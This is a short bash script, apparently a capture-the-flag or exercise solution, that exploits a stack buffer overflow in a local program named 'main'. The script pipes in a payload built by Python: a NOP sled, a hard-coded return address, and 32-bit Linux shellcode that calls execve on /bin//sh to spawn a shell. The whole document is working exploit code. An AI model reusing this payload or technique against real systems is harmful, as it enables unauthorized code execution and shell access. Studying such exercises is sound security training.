#!/bin/bash
# this solution works when both buffers are of the same size and a different overflow behaviour
# occurs
python -c 'print "\x90"*8+"\x34\xf6\xff\xbf"+"\x90"*13+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' | ./main
